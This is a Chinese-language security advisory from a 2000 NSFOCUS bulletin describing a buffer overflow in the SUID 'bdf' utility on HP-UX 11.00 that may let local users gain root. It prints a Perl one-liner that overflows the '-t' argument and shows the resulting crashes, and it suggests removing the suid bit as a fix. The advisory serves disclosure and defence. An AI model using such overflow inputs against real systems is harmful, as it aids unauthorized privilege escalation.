首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第12期->最新漏洞
日期:2000-08-15
受影响的系统:
HP-UX B.11.00
描述:
--------------------------------------------------------------------------------
HPUX所带的bdf程序用来报告系统的自由磁盘块数目。"-t"选项用来指定文件系统
类型。bdf缺省被设置了SUID权限。如果提供一个很长的参数给"-t",将导致bdf
发生缓冲区溢出。本地用户可能获得root权限。
<* 来源:Kyong-won Cho <dubhe@HACKERSLAB.COM> *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omited...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$
<bash environment>
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$
--------------------------------------------------------------------------------
建议:
暂无
临时解决办法:去除bdf的suid属性.
chmod 755 `which bdf`
版权所有,未经许可,不得转载